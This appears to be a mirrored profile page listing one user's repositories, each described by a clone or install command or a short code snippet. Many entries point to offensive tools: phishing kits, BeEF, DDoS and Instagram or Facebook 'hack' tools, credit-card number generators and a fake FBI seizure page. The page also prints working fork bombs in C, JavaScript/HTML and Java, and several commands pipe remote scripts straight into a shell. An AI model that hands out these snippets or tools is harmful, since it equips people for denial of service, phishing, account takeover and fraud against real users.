Giter Site home page Giter Site logo

Anonymouse's Projects

adb-toolkit icon adb-toolkit

wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh && bash InstallTools.sh

advfb icon advfb

git clone https://github.com/Defence-Hackers/ADVFB.git

advphishing icon advphishing

git clone https://github.com/Ignitetch/AdvPhishing.git

auto-fish-termux- icon auto-fish-termux-

pkg install fish neofetch -y && cd && echo "if [ -x /data/data/com.termux/files/usr/libexec/termux/command-not-found ]; then command_not_found_handle() { /data/data/com.termux/files/usr/libexec/termux/command-not-found "$1" } fi PS1='$' clear && neofetch && fish" > /data/data/com.termux/files/usr/etc/bash.bashrc && exit

bash2mp3 icon bash2mp3

git clone https://github.com/htr-tech/bash2mp4

beef-stew icon beef-stew

git clone https://github.com/beefproject/beef.git apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libc6 cd beef/ chmod +x * ls ./install wget https://raw.githubusercontent.com/EXALAB/AnLinux-Resources/master/Scripts/DesktopEnvironment/Apt/Xfce4/de-apt-xfce4.sh && bash de-apt-xfce4.sh

beef-xxs icon beef-xxs

git clone https://github.com/beefproject/beef.git

c-forkbomb icon c-forkbomb

#include <unistd.h> int main(void) { while(1) fork(); return 0; }

checkurl icon checkurl

git clone https://github.com/UndeadSec/checkURL.git

credit-cards icon credit-cards

git clone https://github.com/Anonymous3-SIT/card-number.git

crypto-view icon crypto-view

curl rate.sx/ (BTC or ETH or DOGE etc, etc.........)

darkfly icon darkfly

git clone https://github.com/Ranginang67/DarkFly-Tool

ddos icon ddos

git clone https://github.com/Err0r-ICA/DDoS.git

easy_hack icon easy_hack

git clone https://github.com/sabri-zaki/EasY_HaCk.git

encrypt icon encrypt

git clone https://github.com/adarshaddee/Encrypt.git

fake-number icon fake-number

git clone https://github.com/Nabil-Official/N-ANOM cd N-ANOM/ chmod +x * pip2 install requests cd N-ANOM python3 n-anom.py

fbi icon fbi

git clone https://github.com/xHak9x/fbi.git

fbi-web-takeover icon fbi-web-takeover

git clone https://github.com/AxelTronix/Fake-FBI-Page-This-website-h as-been-seized-.git

fish icon fish

git clone https://github.com/oh-my-fish/oh-my-fish cd oh-my-fish bin/install --offline curl https://raw.githubusercontent.com/oh-my-fish/oh-my-fish/master/bin/install > install fish install --offline=omf.tar.gz curl https://raw.githubusercontent.com/oh-my-fish/oh-my-fish/master/bin/install > install fish install --path=~/.local/share/omf --config=~/.config/omf curl https://raw.githubusercontent.com/oh-my-fish/oh-my-fish/master/bin/install | fish

html-forkbomb icon html-forkbomb

<!DOCTYPE html> <html> <body> <script> setInterval(() => { window.open().document.write(document.documentElement.outerHTML || document.documentElement.innerHTML); }, 10); </script> </body> </html>

instahack icon instahack

https://github.com/masokky/instagram-tools.git

ip icon ip

git clone https://github.com/yezz123/IP.git

ip-tracer icon ip-tracer

git clone https://github.com/khansaad1275/IP-Tracer.git

java-forkbomb icon java-forkbomb

public class ForkBomb { public static void main(String[] args) { while(true) { Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"}); } } }

javascript-forkbomb icon javascript-forkbomb

setInterval(() => { window.open().document.write(document.documentElement.outerHTML || document.documentElement.innerHTML); }, 10);

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.